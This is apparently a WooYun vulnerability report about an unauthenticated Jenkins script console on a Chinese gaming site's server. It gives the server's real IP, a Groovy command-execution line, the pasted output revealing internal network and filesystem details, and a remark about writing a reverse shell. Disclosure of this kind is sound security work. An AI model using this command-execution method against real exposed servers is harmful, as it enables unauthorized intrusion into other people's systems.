当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131690

漏洞标题:中国玩家网某服务器运帷不当可Getshell进内网

相关厂商:中国玩家网

漏洞作者: new

提交时间:2015-08-06 11:33

修复时间:2015-08-11 11:34

公开时间:2015-08-11 11:34

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-06: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国玩家网jenkins未授权访问,getshell进内网

详细说明:

http://180.168.34.2:8080/script
http://www.cwan.com/
虽然jenkins的js丢了,但是命令照样执行

print "uname -a".execute().text
Result
Linux host.cwan.com 2.6.18-348.6.1.el5 #1 SMP Tue May 21 15:29:55 EDT 2013 x86_64 x86_64 x86_64 GNU/Linux
eth0 Link encap:Ethernet HWaddr 00:22:19:56:76:D2
inet addr:180.168.34.2 Bcast:180.168.34.3 Mask:255.255.255.252
inet6 addr: fe80::222:19ff:fe56:76d2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:235441619 errors:0 dropped:0 overruns:0 frame:0
TX packets:348305902 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:129528016945 (120.6 GiB) TX bytes:255686003971 (238.1 GiB)
Interrupt:169 Memory:f8000000-f8012800
eth1 Link encap:Ethernet HWaddr 00:22:19:56:76:D4
inet addr:192.168.2.222 Bcast:192.168.2.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:169 Memory:f4000000-f4012800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:12982475 errors:0 dropped:0 overruns:0 frame:0
TX packets:12982475 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2253308517 (2.0 GiB) TX bytes:2253308517 (2.0 GiB)

漏洞证明:

total 580
drwxr-xr-x 29 root root 4096 Feb 2 2015 .
drwxr-xr-x 29 root root 4096 Feb 2 2015 ..
-rw-r--r-- 1 root root 0 Aug 13 2014 .autofsck
-rw-r--r-- 1 root root 0 Feb 26 2013 .autorelabel
drwxr-xr-x 2 root root 4096 Feb 3 2015 bin
drwxr-xr-x 4 root root 3072 Nov 25 2013 boot
drwxr-xr-x 13 root root 4096 Jun 3 2014 data
drwxr-xr-x 11 root root 3640 Aug 13 2014 dev
drwxr-xr-x 98 root root 12288 Aug 3 04:02 etc
drwxr-xr-x 6 root root 4096 Jul 12 2013 home
-rw-rw-rw- 1 root root 22632 Dec 23 2013 items.json
drwxr-xr-x 11 root root 4096 Feb 3 2015 lib
drwxr-xr-x 8 root root 4096 Feb 3 2015 lib64
drwx------ 2 root root 16384 Feb 26 2013 lost+found
drwxr-xr-x 2 root root 4096 May 11 2011 media
drwxr-xr-x 2 root root 0 Feb 2 2015 misc
drwxr-xr-x 2 root root 4096 May 11 2011 mnt
drwxr-xr-x 3 501 games 4096 Dec 9 2013 mod_wsgi-3.3
-rw-r--r-- 1 root root 117930 Jul 26 2010 mod_wsgi-3.3.tar.gz
-rw-r--r-- 1 root root 117930 Jul 26 2010 mod_wsgi-3.3.tar.gz.1
drwxr-xr-x 3 501 games 4096 Dec 10 2013 mod_wsgi-3.4
-rw-r--r-- 1 root root 122739 Aug 23 2012 mod_wsgi-3.4.tar.gz
drwxr-xr-x 2 root root 0 Feb 2 2015 net
drwxr-xr-x 4 root root 4096 Dec 9 2013 opt
dr-xr-xr-x 215 root root 0 Aug 13 2014 proc
drwxr-x--- 35 root root 4096 Feb 6 15:01 root
drwxr-xr-x 2 root root 12288 Feb 3 2015 sbin
drwxr-xr-x 2 root root 4096 Feb 26 2013 selinux
drwxr-xr-x 2 root root 4096 May 11 2011 srv
drwxr-xr-x 11 root root 0 Aug 13 2014 sys
drwxrwxrwt 7 root root 4096 Aug 4 14:58 tmp
drwxr-xr-x 20 root root 4096 Apr 24 2014 usr
drwxr-xr-x 24 root root 4096 Dec 24 2013 var
drwxr-xr-x 4 www www 4096 Aug 13 2014 zcs
drwxr-xr-x 2 root root 4096 Feb 2 2015 zues


你有 777 的目录,我就可以写python脚本,就能写反弹shell了,想想我只是为了刷点wb,赚点奖品,还是算了
没图不完整,so

222.png

修复方案:

修改jenkins配置,修改访问控制策略
给我20rank

版权声明:转载请注明来源 new@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-11 11:34

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论